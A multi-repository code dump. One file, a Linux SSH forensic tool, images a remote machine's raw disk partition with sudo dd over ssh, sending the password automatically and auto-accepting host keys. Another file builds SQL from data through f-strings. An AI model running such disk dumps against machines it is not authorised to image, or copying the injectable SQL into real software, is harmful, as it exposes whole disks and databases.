while True:
# time.sleep(1)
output = obh.getCurrentData(connection,supportedCommands) #output variable is the data collected in one iteration
currentTime = time.ctime(time.time()) #get current time
print(json.dumps(output)) #prints it to stdout and main.js receives it
output.insert(0,currentTime) #adds rows with the current time
data.append(output) #append current data to total output data array for when csv export is called
if flag != 0:
break
return
flag = 0
getDataThread = Thread(target = main)
getDataThread.daemon = True
getDataThread.start()
while True:
inp = input()
if (inp):
u.csvExporter(heading, data)
flag = 1
``` |
{
"source": "8angy/Linux_SSH_Forensic_Dumper",
"score": 2
} |
#### File: 8angy/Linux_SSH_Forensic_Dumper/lxdumper.py
```python
import os, sys
from os.path import join as pj
from getpass import getpass
import time
from tqdm import tqdm
import threading
import argparse
import pexpect
import ipaddress
NEWKEY = '(?i)are you sure you want to continue connecting'
def get_target_details():
os.system('clear')
operating_system = ''
details_cmd = ('ssh {0}@{1} lsb_release -d'.format(args.TU, args.TI))
# create a shell to pipe our dump command with
child = pexpect.spawn('/bin/bash', ['-c', details_cmd])
i = child.expect([pexpect.TIMEOUT, NEWKEY, '[#$] ', '(?i)password'])
if i == 0:
print('[!] ERROR! SSH connection has failed.')
sys.exit (1)
elif i == 1: # cache public key
child.sendline ('yes')
child.expect ('(?i)password')
elif i == 2:
pass
else: # == 3
child.sendline(target_passwd)
out = child.read().decode('ascii')
child.terminate()
if 'Description:' in out:
for line in out.splitlines():
if 'Description:' in line.strip():
operating_system = line.lstrip().strip().rstrip()
operating_system = operating_system.replace('Description:', '')
return operating_system
def parse_partitions(shell_output):
partitions = []
shell_output = list(filter(None, shell_output.lstrip().strip().splitlines()))
remove_list = ['/', '.', ' - ', '@', ':', '#']
for r in remove_list:
for i in shell_output:
if r in i:
try:
shell_output.remove(i)
except:
pass
for count, parts in enumerate(shell_output, start=0):
col = parts.split(' ')
col = [s for s in col if s != '']
dev = col[3]
size = col[2]
size_mb = '{}MB'.format(str(round((int(col[2])*1024)/1000000)))
partitions.append('{}. {} {} {}'.format(count,dev,size,size_mb))
return partitions
def get_target_partitions():
fdisk_cmd = ('ssh {0}@{1} cat /proc/partitions'.format(args.TU, args.TI))
# create a shell to pipe our dump command with
child = pexpect.spawn('/bin/bash', ['-c', fdisk_cmd])
i = child.expect([pexpect.TIMEOUT, NEWKEY, '[#$] ', '(?i)password'])
if i == 0:
print('[!] ERROR! SSH connection has failed.')
sys.exit (1)
elif i == 1: # cache public key
child.sendline ('yes')
child.expect ('(?i)password')
elif i == 2:
pass
else: # == 3
child.sendline(target_passwd)
partitions = parse_partitions(child.read().decode('ascii'))
child.terminate()
print('')
for i in partitions:
print(i)
while True:
chosen_partition = input('\n[*] Please type the index of the '
'partition you would like to dump: ')
if chosen_partition.isdigit():
if int(chosen_partition) < len(partitions):
break
else:
print('[!] Not an integer! Please select a number between '
'0 and {}'.format(len(partitions)-1))
return (partitions[int(chosen_partition)]).split(' ')
def run(BLOCK_DEV, dump_filename):
global running
checksum = None
dump_cmd = ('ssh {0}@{1} '
'"sudo -S dd conv=sync,noerror bs={2}k if=/dev/{3} '
'| tee >({4} >/dev/stderr) '
'| gzip -{6} -" '
'| dd bs={2} of={5}.gz'.format(args.TU, args.TI, args.BS, BLOCK_DEV,
args.CS, dump_filename, args.Z))
# create a shell to pipe our dump command with
child = pexpect.spawn('/bin/bash', ['-c', dump_cmd])
i = child.expect([pexpect.TIMEOUT, NEWKEY, '[#$] ', '(?i)password'])
if i == 0:
print('[!] ERROR! could not login with SSH')
sys.exit (1)
elif i == 1: # cache public key
child.sendline ('yes')
child.expect ('(?i)password')
elif i == 2:
pass
else: # == 3
child.sendline(target_passwd)
child.timeout = 36000
out = child.read()
child.terminate()
shell_output = list(filter(None, out.lstrip().strip().splitlines()))[1:]
for line in shell_output:
if '-' in line.decode('ascii'):
checksum = line.decode('ascii').replace('-','').strip()
running = False
time.sleep(0.5)
if checksum:
print('\n\n{}:\t{}'.format(args.CS, checksum))
print('Finished Dumping!')
checksum_tf = pj(os.getcwd(),'{}_checksum.txt'.format(BLOCK_DEV))
open(checksum_tf, 'a').close()
with open(checksum_tf, 'w') as ctf:
ctf.write('Target IP: {}\n'.format(args.TI))
ctf.write('Block: {}\n'.format(BLOCK_DEV))
ctf.write('Block Size: {}k\n'.format(args.BS))
ctf.write('{}: {}\n'.format(args.CS, checksum))
def progress(total_size, partition, dump_filename):
global running
total_size = int(total_size)*1024
print('Dumping {} from {}'.format(partition, args.TI))
print('Block Size: {} | Compression Level: {} '
'| Checksum: {}\n'.format(args.BS, args.Z, args.CS))
pbar = tqdm(total=100, unit='B', unit_scale=True, desc='{}'.format(partition))
for i in range(0,100):
if running:
while True:
child = pexpect.spawn('stat {}.gz'.format(dump_filename))
child.expect(dump_filename)
buff = child.read().decode('ascii')
child.terminate()
shell_output = buff.lstrip().strip().strip('\t').strip('\n').rstrip()
size = (shell_output[shell_output.index('Size: '):
shell_output.index('Blocks: ')][6:]).strip()
size = int(size)
percent = round((size/total_size)*100)
if not running:
pbar.update(100-i)
break
if i == percent:
pbar.update(1)
break
else:
time.sleep(0.01)
buff = ''
else:
sys.exit()
if __name__ == '__main__':
print('\nLINUX SSH FORENSIC DUMPER')
print("Append the '--help' command to see usage in detail")
parser = argparse.ArgumentParser(description='Forensic Dump of a Linux OS over SSH')
parser.add_argument('--TI', nargs='?', required=True,
help='The IP address of the target Linux machine.')
parser.add_argument('--TU', nargs='?', required=True,
help='An admin account user of the target Linux machine. e.g. root')
parser.add_argument('--Z', default='3', nargs='?', const='3', type=str,
help='gzip compression. 1 = min (fastest) | 9 = max (slowest). Default: 3')
parser.add_argument('--BS', default='128', nargs='?', const='128', type=str,
help='Block size in KB, (e.g 64, 128, 1024, 65536). Default: 128')
parser.add_argument('--CS', default='md5sum', nargs='?', const='md5sum', type=str,
help='Checksum the dump (cksum=CRC, md5sum=MD5, sha1sum=SHA1). Default: md5sum')
args = parser.parse_args()
global running
running = True
# check inputs
if ipaddress.ip_address(str(args.TI)):
pass
else:
running = False
print('[!] Error! The Target IP address entered is not valid.')
sys.exit()
if len(args.TU) < 2:
print('[!] Error! The Target User is not valid.')
running = False
sys.exit()
if args.BS.isdigit() and (int(args.BS) <= 1310720) and (int(args.BS) % 16 == 0):
pass
else:
running = False
print('[!] Error! Block Size [--BS] must be less than or equal to '
'1310720 and be divisble by 16.')
sys.exit()
if args.Z.isdigit() and int(args.Z) in range(1,10):
pass
else:
running = False
print('[!] Error! gzip compression [--Z] must be an integter '
'between 1 and 9.')
sys.exit()
if args.CS in ['md5sum', 'cksum', 'sha1sum']:
pass
else:
running = False
print('[!] Error! Checksum [--CS] must be either "cksum", '
'"md5sum" or "sha1sum".')
sys.exit()
while True: # connect to target
print('\nPlease input the password for the target: {}'.format(args.TU))
target_passwd = getpass()
if len(target_passwd) > 0:
break
if running:
target_details = get_target_details()
print('LINUX SSH FORENSIC DUMPER')
print('Partitions found on {}'.format(args.TI))
if len(target_details) > 0:
print('OS: {}'.format(target_details.lstrip()))
BLOCK_DEV = get_target_partitions()
dump_filename = '{}_{}_{}'.format(args.TU, args.TI,
BLOCK_DEV[1])
p1 = threading.Thread(target = run, args=(BLOCK_DEV[1],
dump_filename))
p1.start()
p2 = threading.Thread(target = progress, args =(BLOCK_DEV[2],
BLOCK_DEV[1], dump_filename))
p2.start()
``` |
{
"source": "8aqtba9y/stduy-python-Movie-Website",
"score": 3
} |
#### File: 07_make classes_advanced/04_Final/movie.py
```python
import media
import webbrowser as wb
class Movie(media.Media):
def __init__(self, title, storyline, poster_image, trailer_youtube, series) :
media.Media.__init__(self, title, storyline, poster_image, trailer_youtube)
self.series = series
def show_trailer(self) :
wb.open(self.trailer_youtube_url)
``` |
{
"source": "8area8/MacGyver-The-game-",
"score": 3
} |
#### File: core/introduction/core_intro.py
```python
from core.modules.interface import Interface
from core.modules.musics import Music
class Introduction(Interface):
"""The first called interface.
Display an image and play a music for three seconds.
"""
def __init__(self, images):
"""Initialize the core variables."""
super().__init__()
self.windows["bg"] = images["backgrounds"]["intro"]
self.musics = Music("introduction")
self.musics.play_music()
self.timer = 0
self.max_timer = 90
def start_events(self, events):
"""No events."""
pass
def update(self):
"""Update the timer."""
self.timer += 1
if self.timer == self.max_timer:
self.musics.stop_music()
self.change_to = "Game"
def draw(self):
"""Draw the elements."""
self.windows["main"].blit(self.windows["bg"], (0, 0))
```
#### File: tests/game/test_map.py
```python
from pygame import display
from pygame.sprite import Sprite
from core.modules.map_file import import_map
from core.modules.images import collect_images
from core.modules.constants import SCREEN_SIZE
from core.game.map import Map
def test_map():
"""Test the map module."""
display.init()
display.set_mode(SCREEN_SIZE)
images = collect_images()
map_file = import_map()
map_ = Map(images, map_file)
assert len(map_[0]) == 225
for layer in map_:
for key in layer.keys():
assert isinstance(key, tuple)
assert isinstance(layer[key], Sprite)
for digit in key:
assert isinstance(digit, int)
```
#### File: tests/modules/test_map_file.py
```python
from core.modules.map_file import import_map
def test_map_file():
"""Test the importation."""
assert import_map()
``` |
{
"source": "8area8/P5_FoodLik",
"score": 3
} |
#### File: back/database/create_database.py
```python
from os import listdir, path
from pathlib import Path
import json
from core.back.database.databases_wrapper import database_wrapper as database
def init():
"""Initialize the database creation."""
print("Wait few minutes...")
_create_foodlik()
database.connect()
_create_structure()
_fill_in_database()
database.close()
print("database ready for use.")
def _create_foodlik():
"""Create the foodlik database."""
database.connect("root")
database.execute("DROP DATABASE IF EXISTS foodlik")
database.execute("CREATE DATABASE foodlik")
database.close()
print("database created.")
def _create_structure():
"""Create the database structure."""
path = str(Path().resolve() / "core" / "back" / "database")
database.execute(open(path + "/structure.sql", "r").read(), multi=True)
print("structure created.")
def _fill_in_database():
"""Fill in 'foodlik' of datas."""
datas_path = Path().resolve() / "core" / "back" / "requests"
datas_path = datas_path / "datas"
_fill_in_categories(datas_path)
_fill_in_products(datas_path)
_fill_in_products_number(datas_path)
def _fill_in_categories(datas_path):
"""Fill in database of categories."""
cat_fr = str(datas_path / "categories_fr.json")
with open(cat_fr, "r", encoding="utf8") as file:
categories = json.load(file)
for name in categories:
database.execute(f"INSERT INTO category (title) VALUES ('{name}')")
print("Categories done.")
def _fill_in_products(datas_path):
"""Fill in database of products."""
prod_path = datas_path / "products"
for index, file in enumerate(listdir(prod_path)):
with open(str(prod_path / file), "r", encoding='utf8') as product_file:
datas = json.load(product_file)
for product in datas:
try:
_insert_product(product)
name = product["name"]
for ctg in set(product["categories"]): # lazy set, sorry. :p
_insert_categorie_per_product(ctg, name)
except Exception as error:
write_error(error)
print(f"file {index + 1} done.")
def _insert_product(product):
"""Insert a product into the database."""
name = product["name"]
descr = product["description"]
stores = product["stores"]
url = product["site_url"]
score = product["score"]
database.execute("INSERT INTO product (title, description, "
"stores, site_url, score) VALUES "
f"('{name}', '{descr}', '{stores}',"
f" '{url}', '{score}')")
def _insert_categorie_per_product(ctg, name):
"""Insert all categories of a product."""
database.execute("INSERT INTO category_per_product "
"(category_title, product_title) "
f"VALUES ('{ctg}', '{name}')")
def _fill_in_products_number(datas_path):
"""Insert the products number of each category.
Remove lines that do not contain products.
"""
database.execute("SELECT title FROM CATEGORY")
result = [wrd[0] for wrd in database.get_row(True) if wrd[0]]
for category in result:
database.execute("SELECT COUNT(*) "
"FROM CATEGORY_PER_PRODUCT AS CPP "
f"WHERE CPP.category_title='{category}'")
database.execute("UPDATE CATEGORY "
f"SET product_number = {database.get_row()[0]} "
f"WHERE CATEGORY.title = '{category}'")
database.execute("DELETE FROM CATEGORY "
"WHERE product_number = 0")
def write_error(error):
"""Write the errors in a file.
MySQL generates a lot of errors.
"""
mode = "a" if path.exists("error.log") else "w"
with open("error.log", mode, encoding="utf8") as file:
file.write(str(error) + "\n")
```
#### File: front/classes/substitute.py
```python
from termcolor import colored
from core.front.classes.globals import BaseSection
from core.back.database.data_wrapper import datas_wrapper as datas
from textwrap import wrap
class Substitute(BaseSection):
"""The substitute class."""
# pylint: disable=too-many-instance-attributes
def __init__(self):
"""Initialization."""
super().__init__()
self.name = datas.chosen_product.upper()
self.c_return_sub = "[retour sub]: retour à la page des substituts.\n"
@property
def header(self):
"""Return the header informations."""
title = f" {self.name}"
return colored(title, "yellow") + "\n" + " " + "-" * 23
@property
def content(self):
"""Return the content."""
content = datas.load_substitute_page()
text = colored(" SUBSTITUT:\n", "green")
titles = ("nom: ", "description: ",
"magasins: ", "url: ", "nutri-score: ")
for title, caract in zip(titles, content[0]):
caract = "\n ".join(wrap(str(caract), 45))
text += " * " + colored(title, "green") + caract + "\n"
text += colored("\n PRODUITS SUBSTITUES:\n", "green")
for product in content[1]:
product = "\n ".join(wrap(str(product[0]), 45))
text += " * " + product + "\n"
return text + "\n"
@property
def footer(self):
"""Return the footer informations.
Call 'super().footer' to get the error messages.
"""
return (self.comm + self.c_return_sub +
self.c_return_title +
self.c_quit + "\n") + super().footer
@property
def actions(self):
"""Return the possible actions.
Call 'super().actions' to get the basic actions.
"""
return (["retour sub"] + self.a_return_title + super().actions)
def apply(self, action):
"""Apply an action."""
if action == "retour sub":
self.change_to = "Substitutes"
if action == "retour titre":
self.change_to = "TitleScreen"
``` |
{
"source": "8area8/p8_pure_beurre",
"score": 3
} |
#### File: app/extended_lib/anonymous.py
```python
from django.shortcuts import redirect
def anonymous_required(redirect_url):
"""For views that allow only unauthenticated users to access view.
Usage:
@anonymous_required(redirect_url='company_info')
def homepage(request):
return render(request, 'homepage.html')
"""
def _wrapped(view_func, *args, **kwargs):
def check_anonymous(request, *args, **kwargs):
view = view_func(request, *args, **kwargs)
if request.user.is_authenticated:
return redirect(redirect_url)
else:
return view
return check_anonymous
return _wrapped
```
#### File: apps/login/forms.py
```python
from django import forms
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
class SignUpForm(UserCreationForm):
"""Specific form with intermediate email value for signup."""
email = forms.EmailField(
max_length=254, help_text='Requis. Renseignez une adresse mail valide.')
class Meta:
"""User fields."""
model = User
fields = ('username', 'email', '<PASSWORD>', '<PASSWORD>', )
def clean_email(self):
"""Return the email if entered email is unique.
Otherwise gives duplicate_email error.
"""
email = self.cleaned_data['email']
if User.objects.filter(email=email).exists():
raise forms.ValidationError("Cette adresse mail est déjà utilisé.")
return email
```
#### File: apps/login/models.py
```python
from django.db import models
from django.contrib.auth.models import User, AbstractUser
from django.db.models.signals import post_save
from django.dispatch import receiver
from django.utils.translation import ugettext_lazy as _
class Profile(models.Model):
"""User extended."""
user = models.OneToOneField(User, on_delete=models.CASCADE)
email_confirmed = models.BooleanField(default=False)
# other fields...
@receiver(post_save, sender=User)
def update_user_profile(sender, instance, created, **kwargs):
if created:
Profile.objects.create(user=instance)
instance.profile.save()
```
#### File: management/commands/generate_products.py
```python
from django.core.management.base import BaseCommand, CommandError
from apps.products.tasks import ProductsGenerator as generator
class Command(BaseCommand):
"""Command class."""
help = 'Generate all products in database.'
def add_arguments(self, parser):
"""Arguments."""
# Positional arguments
parser.add_argument('--pages', dest='pages', type=int, required=True)
parser.add_argument('--celery', dest='celery',
type=bool, required=True)
def handle(self, *args, **options):
"""Handle the command."""
generator.generate_products(max_pages=options["pages"],
celery=options["celery"])
```
#### File: apps/products/models.py
```python
from django.db import models
from django.contrib.auth.models import User
class Category(models.Model):
"""Categorie model."""
name = models.CharField(max_length=150, unique=True)
def __str__(self):
"""Nicer str."""
return self.name
class Product(models.Model):
"""Product model."""
categories = models.ManyToManyField(Category)
name = models.CharField(max_length=150, unique=True)
description = models.TextField()
stores = models.TextField()
open_food_fact_url = models.URLField(max_length=250)
personal_url = models.URLField(max_length=250)
photo_url = models.URLField(max_length=250)
image_nutrition = models.URLField(max_length=300)
nutriscore = models.CharField(max_length=1)
def __str__(self):
"""Nicer str."""
return self.name
class Substitute(models.Model):
"""Substitute model."""
user = models.ForeignKey(User, on_delete=True)
base_product = models.ForeignKey(
Product, on_delete=True, related_name='base_product')
substituted = models.ForeignKey(
Product, on_delete=True, related_name='substituted')
def __str__(self):
"""Nicer str."""
return f"substitut de {self.user.username} : {self.substituted.name}"
```
#### File: apps/products/tests.py
```python
import json
import httpretty
from django.test import TestCase, TransactionTestCase
from django.test import Client
from django.contrib.auth.models import User
from apps.products.models import Category, Product, Substitute
from apps.products.tasks import CategoriesHandler as cathandler
from apps.products.tasks import FilterProduct as filtprod
from apps.products.tasks import ProductsGenerator as prodgen
from apps.products.tasks import _generate_from_a_page
from apps.products.substitutes_algo import FindSubstitutes as findsub
from apps.products.substitutes_algo import disable_doubles
class CategoriesHandlerTestCase(TestCase):
"""CategoriesHandler tests class."""
def setUp(self):
"""Set up function."""
self.catone = Category.objects.create(name="foololo")
self.catwo = Category.objects.create(name="barlolo")
def test_create_categories_one_created(self):
"""Test create_categories function."""
category_names = "foololo,barlolo,etcfoo"
response = cathandler.create_categories(category_names)
self.assertTrue(Category.objects.filter(name="etcfoo").exists())
expected = [self.catone, self.catwo,
Category.objects.get(name="etcfoo")]
self.assertEqual(response, expected)
self.assertEqual(len(Category.objects.all()), 3)
def test_create_categories_zero_created(self):
"""Test create_categories function."""
category_names = "foololo,barlolo"
response = cathandler.create_categories(category_names)
expected = [self.catone, self.catwo]
self.assertEqual(response, expected)
self.assertEqual(len(Category.objects.all()), 2)
def test_create_categories_four_created(self):
"""Test create_categories function."""
category_names = "lala,lolo,lulu,lili"
response = cathandler.create_categories(category_names)
expected = Category.objects.all().exclude(name="foololo")
expected = expected.exclude(name="barlolo")
self.assertEqual(response, list(expected))
self.assertEqual(len(Category.objects.all()), 6)
class FilterProductTestCase(TestCase):
"""FilterProduct tests class."""
def setUp(self):
"""Set up function."""
self.base_product = {
"image_url": "example.com",
"url": "example.com",
"product_name": "foo",
"categories": "one,two,three",
"nutrition_grade_fr": "a",
"link": "",
"generic_name": "",
"stores": "auchan",
"image_nutrition_url": "example.com",
"xxx": "xxx",
"yyy": "yyy",
"zzz": "zzz"
}
def test_filtered_no_extra_fields(self):
"""Test filtered function."""
response = filtprod.filtered(self.base_product)
expected = {
"photo_url": "example.com",
"open_food_fact_url": "example.com",
"name": "foo",
"categories": "one,two,three",
"nutriscore": "a",
"personal_url": "",
"description": "",
"stores": "auchan",
"image_nutrition": "example.com"
}
self.assertEqual(response, expected)
def test_filtered_wrong_name(self):
"""Test filtered function."""
self.base_product["product_name"] = ""
response = filtprod.filtered(self.base_product)
self.assertIsNone(response)
def test_filtered_wrong_nutriscore(self):
"""Test filtered function."""
self.base_product["nutrition_grade_fr"] = "ab"
response = filtprod.filtered(self.base_product)
self.assertIsNone(response)
class ProductsGeneratorTestCase(TransactionTestCase):
"""ProductsGenerator tests class."""
def setUp(self):
"""Set up function."""
pass
def test_create_DataError(self):
"""Test _create function."""
filtered = {
"photo_url": "example.com",
"open_food_fact_url": "example.com",
"name": "foo",
"categories": "fooone,footwo,foothree",
"nutriscore": "a",
"personal_url": "x" * 300,
"description": "",
"stores": "auchan",
"image_nutrition": "example.com",
}
prodgen._create(filtered)
self.assertEqual(len(Product.objects.all()), 0)
self.assertEqual(len(Category.objects.all()), 3)
def test_create_IntegrityError(self):
"""Test _create function."""
filtered = {
"photo_url": "example.com",
"open_food_fact_url": "example.com",
"name": "foo",
"categories": "fooone,footwo",
"nutriscore": "a",
"personal_url": "example.com",
"description": "",
"stores": "auchan",
"image_nutrition": "example.com",
}
prodgen._create(filtered)
filtered["categories"] = "fooone,footwo"
prodgen._create(filtered)
self.assertEqual(len(Product.objects.all()), 1)
self.assertEqual(len(Category.objects.all()), 2)
def test_create_good_result(self):
"""Test _create function."""
filtered = {
"photo_url": "example.com",
"open_food_fact_url": "example.com",
"name": "foo",
"categories": "fooone,footwo,foothree",
"nutriscore": "a",
"personal_url": "example.com",
"description": "",
"stores": "auchan",
"image_nutrition": "example.com",
}
prodgen._create(filtered)
self.assertTrue(Product.objects.filter(name="foo").exists())
self.assertEqual(len(Category.objects.all()), 3)
@httpretty.activate
def test_generate_from_page_good_result(self):
"""Test generate_from_a_page function.
NOTE: celery poses some problems during the test.
I disabled the asynchrone way.
"""
def mock_requests():
"""Mock json."""
json = {"products": [{
"image_url": "example.com",
"url": "example.com",
"product_name": "foo",
"categories": "fooone,footwo,foothree",
"nutrition_grade_fr": "a",
"link": "example.com",
"generic_name": "",
"stores": "auchan",
"image_nutrition_url": "example.com",
"xxx": "xxx",
"yyy": "yyy",
"zzz": "zzz"
}]}
return json
httpretty.register_uri(
httpretty.GET,
"https://example.com",
body=json.dumps(mock_requests()))
_generate_from_a_page.apply(args=("https://example.com", {})).get()
self.assertTrue(Product.objects.filter(name="foo").exists())
class ProductViewsTestCase(TestCase):
"""Views tests class."""
def setUp(self):
"""Set up function."""
self.client = Client()
self.product_url = "/products/research_product"
self.list_url = "/products/results_list"
self.info_url = "/products/informations"
self.substitute_url = "/products/save_substitute/"
User.objects.create_user(username="Foo", email="<EMAIL>",
password="<PASSWORD>")
Product.objects.create(name="oreo")
Product.objects.create(name="oreo2")
def test_research_product_found(self):
"""Test research_product."""
self.client.login(email="<EMAIL>", password='<PASSWORD>')
product = "oreo"
response = self.client.get(f"{self.product_url}/{product}/")
self.assertTemplateUsed(response, "results.html")
self.assertEqual(response.context["other_results"], 1)
self.assertTrue(response.context.get("product"))
def test_research_product_not_found(self):
"""Test research_product."""
self.client.login(email="<EMAIL>", password='<PASSWORD>')
product = "potiron"
response = self.client.get(f"{self.product_url}/{product}/")
self.assertTemplateUsed(response, "no_products_found.html")
def test_results_list_results(self):
"""Test results_list."""
self.client.login(email="<EMAIL>", password='<PASSWORD>')
product = "oreo"
response = self.client.get(f"{self.list_url}/{product}/")
self.assertTrue(len(response.context["products"].object_list) == 2)
def test_results_list_no_results(self):
"""Test results_list."""
self.client.login(email="<EMAIL>", password='<PASSWORD>')
product = "xzxzxz"
response = self.client.get(f"{self.list_url}/{product}/")
self.assertTrue(len(response.context["products"].object_list) == 0)
def test_informations_not_found(self):
"""Test informations."""
self.client.login(email="<EMAIL>", password='<PASSWORD>')
product = "xzxzxz"
response = self.client.get(f"{self.info_url}/{product}/")
self.assertTemplateUsed(response, "product_not_found.html")
def test_informations_found(self):
"""Test informations."""
self.client.login(email="<EMAIL>", password='<PASSWORD>')
product = "oreo"
response = self.client.get(f"{self.info_url}/{product}/")
self.assertTemplateUsed(response, "informations.html")
self.assertTrue(response.context.get("product"))
self.assertTrue(response.context.get("nutriscore_img"))
def test_save_substitute_no_double(self):
"""Test informations."""
user = User.objects.get(email="<EMAIL>")
self.client.login(email="<EMAIL>", password='<PASSWORD>')
base_product = Product.objects.get(name="oreo")
product = Product.objects.get(name="oreo2")
Substitute.objects.create(user=user, base_product=base_product,
substituted=product)
response = self.client.post(f"{self.substitute_url}",
{"base_product": base_product,
"product": product,
"next": self.substitute_url})
self.assertEqual(len(Substitute.objects.all()), 1)
def test_save_substitute_OK(self):
"""Test informations."""
user = User.objects.get(email="<EMAIL>")
self.client.login(email="<EMAIL>", password='<PASSWORD>')
base_product = Product.objects.get(name="oreo")
product = Product.objects.get(name="oreo2")
response = self.client.post(f"{self.substitute_url}",
{"base_product": base_product,
"product": product,
"next": self.substitute_url})
self.assertEqual(len(Substitute.objects.all()), 1)
class SubstitutesAlgoTestCase(TestCase):
"""Views tests class."""
def setUp(self):
"""Set up function."""
for index in range(5):
Category.objects.create(name=f"cat-{index}")
nutriscore = 96
for index in range(10):
if index % 2 == 0:
nutriscore += 1
product = Product.objects.create(name=f"prod-{index}",
nutriscore=chr(nutriscore))
Product.objects.get(
name="prod-0").categories.add(*Category.objects.all()[:3])
Product.objects.get(
name="prod-2").categories.add(*Category.objects.all()[2:])
Product.objects.get(
name="prod-4").categories.add(*Category.objects.all())
def test_filter_by_nutriscore_a_test(self):
"""Test filter_by_nutriscore function."""
products = Product.objects
substitutes = []
findsub._filter_by_nutriscore("a", products, substitutes)
self.assertEqual(len(substitutes), 2)
nutriscores = [prod.nutriscore for prod in substitutes]
self.assertEqual(nutriscores, ["a", "a"])
def test_filter_by_nutriscore_no_double(self):
"""Test filter_by_nutriscore function.
We add a product in the substitutes list before testing.
"""
products = Product.objects
substitutes = [products.filter(nutriscore="a")[0]]
findsub._filter_by_nutriscore("a", products, substitutes)
self.assertEqual(len(substitutes), 2)
nutriscores = [prod.nutriscore for prod in substitutes]
self.assertEqual(nutriscores, ["a", "a"])
def test_filter_by_nutriscore_b_test(self):
"""Test filter_by_nutriscore function."""
products = Product.objects
substitutes = []
findsub._filter_by_nutriscore("b", products, substitutes)
self.assertEqual(len(substitutes), 2)
nutriscores = [prod.nutriscore for prod in substitutes]
self.assertEqual(nutriscores, ["a", "a"])
def test_filter_by_nutriscore_c_test(self):
"""Test filter_by_nutriscore function."""
products = Product.objects
substitutes = []
findsub._filter_by_nutriscore("c", products, substitutes)
self.assertEqual(len(substitutes), 4)
nutriscores = [prod.nutriscore for prod in substitutes]
self.assertEqual(nutriscores, ["a", "a", "b", "b"])
def test_filter_by_nutriscore_d_test(self):
"""Test filter_by_nutriscore function."""
products = Product.objects
substitutes = []
findsub._filter_by_nutriscore("d", products, substitutes)
self.assertEqual(len(substitutes), 6)
nutriscores = [prod.nutriscore for prod in substitutes]
self.assertEqual(nutriscores, ["a", "a", "b", "b", "c", "c"])
def test_filter_by_nutriscore_e_test(self):
"""Test filter_by_nutriscore function."""
products = Product.objects
substitutes = []
findsub._filter_by_nutriscore("e", products, substitutes)
self.assertEqual(len(substitutes), 6)
nutriscores = [prod.nutriscore for prod in substitutes]
self.assertEqual(nutriscores, ["a", "a", "b", "b", "c", "c"])
def test_search_in_categories_len_0(self):
"""Test search_in_categories function."""
product = Product.objects.get(name="prod-0")
name = product.name
nutriscore = product.nutriscore
categories = product.categories.all()
substitutes = findsub._search_in_categories(name, nutriscore,
categories)
self.assertEqual(len(substitutes), 0)
def test_search_in_categories_len_1(self):
"""Test search_in_categories function."""
product = Product.objects.get(name="prod-2")
name = product.name
nutriscore = product.nutriscore
categories = product.categories.all()
substitutes = findsub._search_in_categories(name, nutriscore,
categories)
self.assertEqual(len(substitutes), 1)
def test_search_in_categories_len_2(self):
"""Test search_in_categories function."""
product = Product.objects.get(name="prod-4")
name = product.name
nutriscore = product.nutriscore
categories = product.categories.all()
substitutes = findsub._search_in_categories(name, nutriscore,
categories)
self.assertEqual(len(substitutes), 2)
def test_run_ok(self):
"""Test run function."""
product = Product.objects.get(name="prod-4")
substitutes = findsub.run(product)
self.assertEqual(len(substitutes), 2)
one, two = substitutes
self.assertEqual(one.nutriscore, "nutriscore-a.png")
def test_disable_doubles(self):
"""Test disable_doubles function."""
user = User.objects.create_user(username="foo", password="<PASSWORD>")
product = Product.objects.get(name="prod-0")
substituted = Product.objects.get(name="prod-1")
substitute = Substitute.objects.create(base_product=product,
substituted=substituted,
user=user)
substitutes = [substituted]
disable_doubles(substitutes, user)
self.assertTrue(substitutes[0].double)
``` |
{
"source": "8area8/plenkton-api",
"score": 2
} |
#### File: alembic/versions/1ffedfb6ea81_base.py
```python
import sqlalchemy as sa
from alembic import op
# revision identifiers, used by Alembic.
revision = "1ffedfb6ea81_base"
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
op.create_table(
"authors",
sa.Column("id", sa.Integer(), nullable=False),
sa.Column("auth0_id", sa.String(length=255), nullable=False),
sa.Column("email", sa.String(length=255), nullable=False),
sa.Column("username", sa.String(length=255), nullable=False),
sa.Column("is_admin", sa.Boolean(), nullable=True),
sa.PrimaryKeyConstraint("id"),
sa.UniqueConstraint("auth0_id"),
)
op.create_table(
"tags",
sa.Column("id", sa.Integer(), nullable=False),
sa.Column("name", sa.String(length=255), nullable=False),
sa.PrimaryKeyConstraint("id"),
sa.UniqueConstraint("name"),
)
op.create_table(
"articles",
sa.Column("id", sa.Integer(), nullable=False),
sa.Column("name", sa.String(length=100), nullable=False),
sa.Column("teaser", sa.String(length=500), nullable=False),
sa.Column("body", sa.Text(), nullable=False),
sa.Column("author", sa.Integer(), nullable=False),
sa.Column("created_at", sa.DateTime(), nullable=True),
sa.Column("modified_at", sa.DateTime(), nullable=True),
sa.ForeignKeyConstraint(
["author"], ["authors.id"], name="fk_articles_authors_id_author"
),
sa.PrimaryKeyConstraint("id"),
sa.UniqueConstraint("name"),
)
op.create_table(
"articles_tags",
sa.Column("id", sa.Integer(), nullable=False),
sa.Column("tag", sa.Integer(), nullable=True),
sa.Column("article", sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(
["article"],
["articles.id"],
name="fk_articles_tags_articles_article_id",
onupdate="CASCADE",
ondelete="CASCADE",
),
sa.ForeignKeyConstraint(
["tag"],
["tags.id"],
name="fk_articles_tags_tags_tag_id",
onupdate="CASCADE",
ondelete="CASCADE",
),
sa.PrimaryKeyConstraint("id"),
)
def downgrade():
op.drop_table("articles_tags")
op.drop_table("articles")
op.drop_table("tags")
op.drop_table("authors")
``` |
{
"source": "8area8/work-calendar",
"score": 3
} |
#### File: management/commands/add_samples.py
```python
from django.core.management.base import BaseCommand
from django.contrib.auth import get_user_model
from django.db.utils import IntegrityError
from back.apps.worker.models import Employee
class Command(BaseCommand):
"""Command class."""
help = "Add data sample."
def handle(self, *args, **options):
"""Handle command."""
User = get_user_model()
try:
User.objects.create_superuser(
username="admin", email="<EMAIL>", password="<PASSWORD>"
)
except IntegrityError:
print("Admin user is already defined.")
try:
User.objects.create_user(
username="john", email="<EMAIL>", password="<PASSWORD>"
)
except IntegrityError:
print("user is already defined.")
try:
Employee.objects.create(name="foo", salary=10, preference="morning")
Employee.objects.create(name="bar", salary=11, preference="evening")
except IntegrityError:
print("Employees are already defined.")
```
#### File: apps/worker/models.py
```python
from typing import Tuple, List
from datetime import datetime, date
from calendar import Calendar, monthrange
from django.contrib.postgres.fields import ArrayField
from django.db import IntegrityError
from django.db import transaction
